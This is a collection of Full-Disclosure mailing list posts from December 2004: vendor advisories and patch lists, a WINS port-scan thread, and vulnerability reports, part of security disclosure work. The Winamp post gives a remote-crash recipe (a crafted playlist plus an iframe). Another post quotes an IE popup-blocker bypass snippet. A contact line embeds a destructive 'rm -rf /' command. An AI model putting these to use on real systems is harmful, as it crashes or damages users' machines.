[Full-Disclosure] STG Security Advisory: [SSA-20041209-13] UseModWiki XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 STG Security Advisory: [SSA-20041209-13] UseModWiki XSS vulnerability Revision 1.0 Date Published: 2004-12-09 (KST) Last Update: 2004-12-09 Disclosed by SSR Team ([EMAIL PROTECTED]) Summary UseModWiki is one of famous wiki web applications. It has a cross-site scripting vulnerability. Vulnerability Class === Implementation Error: Input validation flaw Details === Due to an input validation flaw, the UseModWiki is vulnerable to cross-site scripting attacks. http://[victim]/cgi-bin/wiki.pl?
Re: [Full-Disclosure] [HV-LOW] Symantec LiveUpdate issues may cause DoS
If an attacker can spoof the signature file download site, he can potentially do quite a bit worse than this (in that he can deny the usability of the antivirus engine at all by providing a bogus signature file). I'd think that some form of cryptography would be in use to prevent this (either SSL or signing of the archives themselves). Am I mistaken? (Caveat being that I don't use any anti-virus products of this nature, so I really don't know.) On Thu, Nov 04, 2004 at 03:56:02PM -0800, [EMAIL PROTECTED] wrote: > After downloading ZIP archive off the website (either legitimate > Symantec website or a spoofed one controlled by attacker) -- Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !
This is what one of our developers came up with: "I could only find one bypass that uses the DHTML Edit Control ActiveX control (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) installed with the IE. An example of this is http://www.malware.com/flopup.html This still showed a popup even when I said block all popups. It basically uses this ActiveX control to execute a javascript as follows: x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); You could either disable this control (which I don't know if there are programs that depend on it). You could also disallow ActiveX controls which would break Sharepoint among other things." Any comments? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Scott Renna Sent: Friday, December 10, 2004 11:42 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut ! Beautiful...how many more fun ones like these until people start to migrate away from IE. [EMAIL PROTECTED] wrote: > Friday, December 10, 2004 > > Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys > a fairly robust "popup blocker". > > This little 'thing' has been a major irritation to date. Nothing gets past > it until now. Chatter exists that some sites have defeated it on the > causal default setting. We only deal in the high settings here ! > > Our Chairman and CEO, Mr. Liu Die Yu takes the sledgehammer and cracks > open this bothersome little nut like so: > > http://www.malware.com/flopup.html > > Notes: > > 1. Nothing like a bit of irritation to get constructive > 2. Additional popup blocker from MSN is also killed, may may Die ! too > 3. Get editive before it's too late: http://www.editive.com > 4. None > > End Call > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This e-mail is the property of Oxygen Media, LLC. It is intended only for the person or entity to which it is addressed and may contain information that is privileged, confidential, or otherwise protected from disclosure. Distribution or copying of this e-mail or the information contained herein by anyone other than the intended recipient is prohibited. If you have received this e-mail in error, please immediately notify us by sending an e-mail to [EMAIL PROTECTED] and destroy all electronic and paper copies of this e-mail. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
hmm well, pdx.edu has a computer scanning the world, hit hundreds of other hosts http://www.mynetwatchman.com/LID.asp?ip=131.252.116.141 http://www.dshield.org/ipinfo.php?ip=131.252.116.141 maybe you call them and ask? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2004:149 - Updated postgresql packages fix temporary file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: postgresql Advisory ID:MDKSA-2004:149 Date: December 13th, 2004 Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1 __ Problem Description: The Trustix development team found insecure temporary file creation problems in a script included in the postgresql package. This could allow an attacker to trick a user into overwriting arbitrary files he has access to. The updated packages have been patched to prevent this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0977 __ Updated Packages: Mandrakelinux 10.0: 42ee929f1d987654c3d18a93651bd71e 10.0/RPMS/libecpg3-7.4.1-2.2.100mdk.i586.rpm db39f8074f6d90240c23bf5ec1f785a0 10.0/RPMS/libecpg3-devel-7.4.1-2.2.100mdk.i586.rpm a7746beff4b6d47aa8d9cc5c5ca46bf3 10.0/RPMS/libpgtcl2-7.4.1-2.2.100mdk.i586.rpm 2d2ede92fbdbcc7a9504015fc532b150 10.0/RPMS/libpgtcl2-devel-7.4.1-2.2.100mdk.i586.rpm f13bdbed6efc524a7bbdf6d232b0093e 10.0/RPMS/libpq3-7.4.1-2.2.100mdk.i586.rpm 470b28bf6f82a13a2d266c5417d04533 10.0/RPMS/libpq3-devel-7.4.1-2.2.100mdk.i586.rpm d02317c7fd9db0a3faf225688b4874b1 10.0/RPMS/postgresql-7.4.1-2.2.100mdk.i586.rpm 549800345474a3b33d59db5376389885 10.0/RPMS/postgresql-contrib-7.4.1-2.2.100mdk.i586.rpm 2fd5328fa98becbdaa22007926c473b4 10.0/RPMS/postgresql-devel-7.4.1-2.2.100mdk.i586.rpm 415467b037e260e3a8a5f6451e4bf415 10.0/RPMS/postgresql-docs-7.4.1-2.2.100mdk.i586.rpm fe6cfe7cfd7c24062305dff1a6e1b294 10.0/RPMS/postgresql-jdbc-7.4.1-2.2.100mdk.i586.rpm bc01788a5b21564916fdf995c7b0e47d 10.0/RPMS/postgresql-pl-7.4.1-2.2.100mdk.i586.rpm 5d9a6bfc0dd20edddb7bdf6f56fd0e95 10.0/RPMS/postgresql-server-7.4.1-2.2.100mdk.i586.rpm 40fcaecae0fe467eb082f065cbf06865 10.0/RPMS/postgresql-tcl-7.4.1-2.2.100mdk.i586.rpm 77d53b5d459ba3d31b50895da67689b4 10.0/RPMS/postgresql-test-7.4.1-2.2.100mdk.i586.rpm b5e9dd330b5a93f2e31c78612da3a1ba 10.0/SRPMS/postgresql-7.4.1-2.2.100mdk.src.rpm Mandrakelinux 10.0/AMD64: d3440d6317df79751543b7f22dc20b60 amd64/10.0/RPMS/lib64ecpg3-7.4.1-2.2.100mdk.amd64.rpm ddd1b953d28b8910af06d8decfa0149d amd64/10.0/RPMS/lib64ecpg3-devel-7.4.1-2.2.100mdk.amd64.rpm 607243700c600e07c9e763c0ece9b182 amd64/10.0/RPMS/lib64pgtcl2-7.4.1-2.2.100mdk.amd64.rpm 989358fda80fecaadb0e2e7d6bd2b6f3 amd64/10.0/RPMS/lib64pgtcl2-devel-7.4.1-2.2.100mdk.amd64.rpm 19fbfbcd84538a8410746bd2f3ea84c9 amd64/10.0/RPMS/lib64pq3-7.4.1-2.2.100mdk.amd64.rpm 57584a8013b252ffd59226ee2f470074 amd64/10.0/RPMS/lib64pq3-devel-7.4.1-2.2.100mdk.amd64.rpm 06d45b7bb58f706efad0d7d9402863e3 amd64/10.0/RPMS/postgresql-7.4.1-2.2.100mdk.amd64.rpm 3051717bc1a5ec844ff7fb9297c60a18 amd64/10.0/RPMS/postgresql-contrib-7.4.1-2.2.100mdk.amd64.rpm 7d20ec815a7ad95e15d3a3bc7224edb8 amd64/10.0/RPMS/postgresql-devel-7.4.1-2.2.100mdk.amd64.rpm 91eb092a900105a459d12731ef8b3849 amd64/10.0/RPMS/postgresql-docs-7.4.1-2.2.100mdk.amd64.rpm f2da22a5c1dad2e5f717031ee6a2646f amd64/10.0/RPMS/postgresql-jdbc-7.4.1-2.2.100mdk.amd64.rpm d692ef3e7a59ede26a01640e48417b5f amd64/10.0/RPMS/postgresql-pl-7.4.1-2.2.100mdk.amd64.rpm f607a841fe8f40bd6ca89822c3bdb6e6 amd64/10.0/RPMS/postgresql-server-7.4.1-2.2.100mdk.amd64.rpm 4b6fe73d3fd986dd9a770ba8ff5864e7 amd64/10.0/RPMS/postgresql-tcl-7.4.1-2.2.100mdk.amd64.rpm 1de143fdd0ac197b19cb451a86c63f46 amd64/10.0/RPMS/postgresql-test-7.4.1-2.2.100mdk.amd64.rpm b5e9dd330b5a93f2e31c78612da3a1ba amd64/10.0/SRPMS/postgresql-7.4.1-2.2.100mdk.src.rpm Mandrakelinux 10.1: 038b421964e5a06edc0cac07bc6f3357 10.1/RPMS/libecpg3-7.4.5-4.1.101mdk.i586.rpm f3e8e3f87c09151241dc48eb9c650d38 10.1/RPMS/libecpg3-devel-7.4.5-4.1.101mdk.i586.rpm 90ec55f75b39ef3c8c3ed9b99f832414 10.1/RPMS/libpgtcl2-7.4.5-4.1.101mdk.i586.rpm 231c7257b30d0ce6adfd3a98f55cf0e7 10.1/RPMS/libpgtcl2-devel-7.4.5-4.1.101mdk.i586.rpm 549bb1646113fd1d26453ad7e036bc47 10.1/RPMS/libpq3-7.4.5-4.1.101mdk.i586.rpm 1c42911cd577275f87fc8af503e58ae8 10.1/RPMS/libpq3-devel-7.4.5-4.1.101mdk.i586.rpm cc6539fd61356d1ea6ec7b2d99d092da 10.1/RPMS/postgresql-7.4.5-4.1.101mdk.i586.rpm ba9dc03f958ed7839eead88c4520fc82 10.1/RPMS/postgresql-contrib-7.4.5-4.1.101mdk.i586.rpm e8fe9519d222e7350723bed3b1d9d969 10.1/RPMS/postgresql-devel-7.4.5-4.1.101mdk.i586.rpm 09e6494b80b19df104092c60b8ce756d 10.1/RPMS/postgresql-docs-7.4.5-4.1.101mdk.i586.rpm 8453edde5e91a015a44c1217a08d6f78 10.1/RPMS/postgresql-jdbc-7.4.5-4.1.101mdk.i586.rpm 36b29f846bee72f41cc1dc8f626d25ad 10.1/RPMS/post
[Full-Disclosure] MDKSA-2004:148 - Updated iproute2 packages fix temporary file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: iproute2 Advisory ID:MDKSA-2004:148 Date: December 13th, 2004 Affected versions: 10.0, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 __ Problem Description: Herbert Xu discovered that iproute can accept spoofed messages sent via the kernel netlink interface by other users on the local machine. This could lead to a local Denial of Service attack. The updated packages have been patched to prevent this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0856 __ Updated Packages: Mandrakelinux 10.0: 290adad6e69300fa2781331090b9710f 10.0/RPMS/iproute2-2.4.7-11.1.100mdk.i586.rpm 44b2961ae2973264493bd34dbabd298f 10.0/SRPMS/iproute2-2.4.7-11.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 0f077f6057ded8de93567b9f4381bb36 amd64/10.0/RPMS/iproute2-2.4.7-11.1.100mdk.amd64.rpm 44b2961ae2973264493bd34dbabd298f amd64/10.0/SRPMS/iproute2-2.4.7-11.1.100mdk.src.rpm Corporate Server 2.1: 40151a76e2858db11fa0222da80b07e7 corporate/2.1/RPMS/iproute2-2.4.7-4.2.C21mdk.i586.rpm 675c40d02db789e13254a2dabd246887 corporate/2.1/SRPMS/iproute2-2.4.7-4.2.C21mdk.src.rpm Corporate Server 2.1/x86_64: 2c12ed5a57a03d3fc5817dbb82db9101 x86_64/corporate/2.1/RPMS/iproute2-2.4.7-4.2.C21mdk.x86_64.rpm 675c40d02db789e13254a2dabd246887 x86_64/corporate/2.1/SRPMS/iproute2-2.4.7-4.2.C21mdk.src.rpm Mandrakelinux 9.2: bd787588ff4f13c7f01d1ff72468a58d 9.2/RPMS/iproute2-2.4.7-11.1.92mdk.i586.rpm 8a514462f7df3790a83f3459529b570b 9.2/SRPMS/iproute2-2.4.7-11.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 8eabf21a5800311960c1a0c624095dea amd64/9.2/RPMS/iproute2-2.4.7-11.1.92mdk.amd64.rpm 8a514462f7df3790a83f3459529b570b amd64/9.2/SRPMS/iproute2-2.4.7-11.1.92mdk.src.rpm Multi Network Firewall 8.2: 9db0dd8abc802c56b6d080267419c605 mnf8.2/RPMS/iproute2-2.2.4-13.1.M82mdk.i586.rpm 028f2565993c862fe24c862d536cec71 mnf8.2/SRPMS/iproute2-2.2.4-13.1.M82mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBvjC6mqjQ0CJFipgRAkXMAJ4zJhh8cBOUuP+csEloZyGxvVtCUgCg5Zxl HNzHDq4AkhSqcuXFuzX1MOo= =/iAg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200412-07 ] file: Arbitrary code execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200412-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: file: Arbitrary code execution Date: December 13, 2004 Bugs: #72521 ID: 200412-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The code for parsing ELF headers in file contains a flaw which may allow an attacker to execute arbitrary code. Background == file is a utility used to identify the type of a file. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 sys-apps/file < 4.12>= 4.12 Description === A possible stack overflow has been found in the ELF header parsing code of file. Impact == An attacker may be able to create a specially crafted ELF file which, when processed with file, may allow the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All file users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/file-4.12" References == [ 1 ] SecurityTracker Alert ID 1012433 http://securitytracker.com/id?1012433 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200412-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgp1tUm5JCYQF.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] TCP Port 42 port scans? What the heck over ...
There's an outstanding security issue with WINS on Windows servers - TCP port 42 is the WINS port. Cheers Stu > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf > Of James Lay > Sent: Tuesday, 14 December 2004 2:47 a.m. > To: Full-Disclosure (E-mail) > Subject: [Full-Disclosure] TCP Port 42 port scans? What the > heck over... > > Here they be. ODD. Anyone else seeing this? > > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.1 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: Web1 drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.18.1 > LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.4 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 workbox kernel: IN=eth0 OUT= > MAC=00:60:97:a5:76:36:00:10:7b:90:bc:30:08:00 > SRC=131.252.116.141 DST=10.1.200.10 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.7 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: X12 drops:IN=br0 OUT=br0 PHYSIN=eth1 > PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.14 LEN=40 > TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.2 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: Htpedi drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.20.17 > LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Edirecall > drops:IN=br0 OUT=br0 PHYSIN=eth1 PHYSOUT=eth0 > SRC=131.252.116.141 DST=10.1.20.12 LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 > > > > James Lay > Network Manager/Security Officer > AmeriBen Solutions/IEC Group > Deo Gloria!!! > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Secure Network Operations SNOsoft Research Team [SRT2004-12-14-0322] Symantec LiveUpdate Advisory
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact JxT[at]secnetops[.]com Spam Contact `rm -rf /[EMAIL PROTECTED] Who we are: ** Secure Network Operations provides network security services that ensure safe, reliable and available network data, applications and access. Our team of security professionals has successfully secured networks and applications for organizations in both the public and the private sectors. Customers benefit from proprietary analysis tools and processes that identify vulnerabilities and threats, resulting in secure network architectures. Secure Network Operations ensures customers' networks are as secure as possible with Vulnerability Audits, Penetration Tests, Strategic Reconnaissance, Forensic Research and Custom Consulting services. Customers networks will be secure due to the unique combination of experience, proprietary tools and constant security research offered by Secure Network Operations. Quick Summary: ** Advisory Number : SRT2004-12-14-0322 Product : Symantec LiveUpdate Version : Prior to version 2.5 Vendor : http://symantec.com/techsupp/files/lu/lu.html Class : Local Criticality : High (to users of the below listed products) Products Affected : Symantec Windows LiveUpdate prior to v2.5 : Symantec Norton SystemWorks 2001-2005 : Symantec Norton AntiVirus 2001-2005 : Symantec Norton AntiVirus Pro 2001-2004 : Symantec Norton Internet Security 2001-2005 : Norton Internet Security Pro 2001-2004 : Symantec Norton AntiSpam 2005 : Symantec AntiVirus for Handhelds Retail and Corporate Edition v3.0 Not Affected : Symantec Windows LiveUpdate v2.5 and later : Symantec Java LiveUpdate (all versions) : Symantec Enterprise products (Symantec Enterprise products do not support the Automatic LiveUpdate functionality with the exception of Symantec AntiVirus for Handhelds Corporate Edition v3.0) Operating System(s): ** - Win32 Notice: ** The full technical details of this vulnerability can be found at: http://www.secnetops.com under the research section. Basic Explanation: ** High Level Description : LiveUpdate allows local users to become SYSTEM What to do : run LiveUpdate and apply latest patches. Proof Of Concept Status: ** Functional, Contact SNO for details. Short Description: ** Symantec Automatic LiveUpdate, a functionality included with many Symantec retail products as well as on Symantec AntiVirus for Handhelds Corp v3.0, is launched by the system scheduler on system startup and then periodically after startup. Symantec LiveUpdate can automatically check for available updates to any supported Symantec products installed on the system using a scheduled task call NetDetect. Vulnerable versions of the Symantec Automatic LiveUpdate are initially launched at startup and were being assigned Local System privileges. During the period when an interactive LiveUpdate session is available, and only during this session, a non-privileged user could potentially manipulate portions of the LiveUpdate GUI Internet options configuration functionality to gain elevated privilege on the local host. For example, the non-privileged user could gain privileges to search and edit all system files, assume full permission for directories and files on the host, or create new user accounts on the local system. Additional Information: ** If exploited effectively this issue would permit a non-privileged user to gain privileged access on the local host. Symantec has produced a list of mitigating circumstances that reduce the risk of exploitation in the Automatic LiveUpdate feature. Symantec Automatic LiveUpdate is only implemented in retail versions of Symantec products with
Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !
The pop-up does not work with all options relating to ActiveX set to disabled, but most user would not bother to disable it. Another reason to use another browser. J [EMAIL PROTECTED] wrote: Friday, December 10, 2004 Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys a fairly robust "popup blocker". This little 'thing' has been a major irritation to date. Nothing gets past it until now. Chatter exists that some sites have defeated it on the causal default setting. We only deal in the high settings here ! Our Chairman and CEO, Mr. Liu Die Yu takes the sledgehammer and cracks open this bothersome little nut like so: http://www.malware.com/flopup.html Notes: 1. Nothing like a bit of irritation to get constructive 2. Additional popup blocker from MSN is also killed, may may Die ! too 3. Get editive before it's too late: http://www.editive.com 4. None End Call ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] GPRS/IP-session from Nokia/Symbian mobilephonestays up
Dude, What you see is a "feature" of the GPRS system and really up to the operators to control. It works like this: In a simplified form: in GPRS the mobile phone authenticates to the mobile network via SGSN which gets its response from the HLR/VLR. The SGSN then sets up the PDP context between the MS (mobile) and the SGSN - the GGSN is informed of the context which allows it to request an IP for the mobile. Once this is complete, traffic in the form of PDUs can then traverse the network from the MS to the GGSN. TCP/IP traffic is then encapuslated within the PDUs. In the standard case traffic flow can be initiated by the MS or by the GGSN depending on the traffic direction. In the standards, traffic can flow from MS to MS via the GGSN or from the MS to GGSN or from the GGSN to the MS. It is up to the operator to filter the traffic. Originally it was envisaged that people would want to send packets from MS to MS, from the Internet to the MS and from the MS to the Internet. It is up to the operator to control that as they see fit. For MS to MS traffic flow the PDUs must traverse through the GGSN as the MSs may be using different SGSNs. (Normally in different geographic locations) From memory the PDP context can have a no-activity timeout or the network can initiate "call tear-down" from the MS (by hanging up) or by the GGSN. It is up to the operator as to if then enable the timeout and what duration is set. If there is traffic on the PDP context then the context will stay up - think of it like PPP on demand dialing. The operators DHCP server leases out an address; users can not 'steal' a DHCP lease - as there are limits on how many IPs a MS can get. The limits are both hardware/software and set by the operator. Second point, IPv6 is becomming available on vendor equipment as time goes by. It is in the standards - see 3GPP - but because of legacy equipment operators are slow to take it up hence the lack of IPv6 implementation on mobile networks. When you have 10,000s of MS out there that do not support IPv6 you really cannot "turn it on" over night."Juliao Duartenn (Oblog-Direccao)" <[EMAIL PROTECTED]> wrote: As stated by the original poster, costs are definitely not the only issue here.One of the main abuse forms for this is depleting the entire provider GPRS IP range. Even though IPv6 is now almost 10 years old, mobile carriers still chose to implement IP over GPRS using IPv4.This, of course, leaves them open to address depletion.And now, will they change?Julião> > Howdy,> >> > I think this is part of the reason why some carriers, such > as T-Mobile,> > use RFC1918 addresses instead of publically routable IPs.> > Not here in the Netherlands :-)> > inetnum: 194.229.200.0 - 194.229.207.255> netname: T-MOBILE-NL> descr: t-mobile.nl> country: NL> admin-c: RM1746-RIPE> tech-c: RM1746-RIPE> status: ASSIGNED PA> mnt-by: NLNET-MN! T> changed: [EMAIL PROTECTED] 20030801> source: RIPE> > I get an IP-address out of this range on my phone.> > --> Marco> > > > > They do allow> > you to specifically request real addresses if you need it > for something> > like IPSec too. Of course, this is kind of a moot point > when they have> > unlimited data plans in the US.> >> > William Reading> >> > Marco Davids (Prive) wrote:> >> > >Hi,> > >> > >For what it is worth:> > >> > >When my Nokia 6600 (Symbian V7.0s) mobile phone was > connected to the> > >Internet and an imap-server for some tests the other day, > I decided to> > >run a ping to the phone's IP-address (in fact I did an > nmap -O to the> > >phone first, but that didn't work).! > > >> > >After the mail was retrieved I closed the > email-application on the phone.> > >Normally the GPRS-session is terminated in such a case. > But not this time,> > >while the pings went on. This time I had to force the > session to go down,> > >which is an option on the phone, luckily. I just never > used it before :-)> > >> > >Later on I tried an SSH-session with the Mocha Telnet > application from my> > >phone. Same behaviour. After I closed the SSH-application > and as the> > >pings went on the (expensive) GPRS-session did not terminate as it> > >normally does when there is no incoming icmp traffic. When > I finished> > >the external pings to the phone, the GPRS-session closed by itself.> > >> > >I tried again, this time with a larger packet-size, but >! that did not work.> > >> > >Then I tried a flood-ping and that did work. The > GPRS-session stayed up> > >and the GRPS-counters increased dramatically! By this time > my little> > >experiments where getting rather pricey for me.> > >> > >Conclusion: Even after the last application that uses IP > on the phone is> > >closed, the GPRS-session stays up as long as there is incoming> > >(icmp)traffic. I am not sure what to think of this, but this seems> > >rather undesirable to me. Do other phones also 'suffer' form this> > >behaviour?> > >> > >This 'feature' can be abused. One could easily be lead to > believ
[Full-Disclosure] Winamp 5.07 (latest version) Remote Crash + other stupid shizle
Winamp 5.07 (latest version) Remote Crash. + vuln to cause 100% cpu usage. 13/12/04 I. BACKGROUND Winamp is a very popular windows audio and video player. It also has alot of other features and is used by millions of people across the world. II. DESCRIPTION VULN 1. There is a vuln in winamp's handling of .mp4 and .m4a files. Which when exploited can remotly crash the victims winamp. The vuln lies in the .mp4 tagging system which winamp uses.If you use winamps built in feature to edit the tags on .mp4 or .m4a files and insert any data in there the next time the file is opened it will instantly crash winamp. now how to crash it remotly. if we create a .pls file contaning the data [playlist] numberofentries=5 File1=http://b0f.pwp.blueyonder.co.uk/a.mp4 Title1= Length5=-1 Version=2 and make a html page containing an iframe linking to the .pls like. http://b0f.pwp.blueyonder.co.uk/exp2.pls";> now if the victim clicks a link to a page like http://b0f.pwp.blueyonder.co.uk/wexp3.htm it will auto open up the .pls file and load the .mp4 file into winamp and crash it. This could also be done with .m3u instead of .pls VULN 2. This one is simple if you create say a 1mb file probably smaller filled with junk and name it with either .nsv or .nsa file extension. When opened in winamp it will cause 100% cpu usage. The bigger the size of the file the more it will probably slow down the system. III. ANALYSIS Vuln 1. Successful exploitation allows remote attackers to crash the victims winamp. Vuln 2. Successful exploitation causes 100% cpu usage. IV. DETECTION This has been confirmed in the latest version of winamp 5.07 and probably vuln in earlier versions. V. WORKAROUND Don't open suspicous .mp4 .m4a .nsa or .nsv files or click untrusted links. VI. VENDOR The vendor has not been contacted. Why bother ? one asks VII. CREDIT Alan M aka b0f ([EMAIL PROTECTED]) P.S Buy Tupac - Loyal to the Game out 14/12/04 __ Do you Yahoo!? Yahoo! Mail - Easier than ever with enhanced search. Learn more. http://info.mail.yahoo.com/mail_250 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
* James Lay: > Here they be. ODD. Anyone else seeing this? Probably yes. 8-) 42/TCP is used by Microsoft's WINS replication, and this service has got a security hole for which Microsoft has yet to release a patch. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
WINS Vulnerability announced over Thanksgiving: http://www.immunitysec.com/downloads/instantanea.pdf People are looking for WINS Servers. I hope everyone has ingress filters preventing WINS access from the Internet... -Dave Killion > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf > Of James Lay > Sent: Monday, December 13, 2004 5:47 AM > To: Full-Disclosure (E-mail) > Subject: [Full-Disclosure] TCP Port 42 port scans? What the > heck over... > > Here they be. ODD. Anyone else seeing this? > > Dec 13 06:41:49 gateway kernel: Web netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.1 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 gateway kernel: Web1 drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.18.1 > LEN=40 TOS=0x00 PREC=0x00 > TTL=116 ID=57370 DF PROTO=TCP SPT=6000 DPT=42 WINDOW=65535 > RES=0x00 SYN URGP=0 Dec 13 06:41:49 gateway kernel: Web > netrecall drops:IN=br0 OUT=br0 > PHYSIN=eth1 PHYSOUT=eth0 SRC=131.252.116.141 DST=10.1.19.4 > LEN=40 TOS=0x00 PREC=0x00 TTL=116 ID=57370 DF PROTO=TCP > SPT=6000 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0 Dec 13 > 06:41:49 workbox kernel: IN=eth0 OUT= > MAC=00:60:97:a5:76:36:00:10:7b:90:bc:30:08:00 > 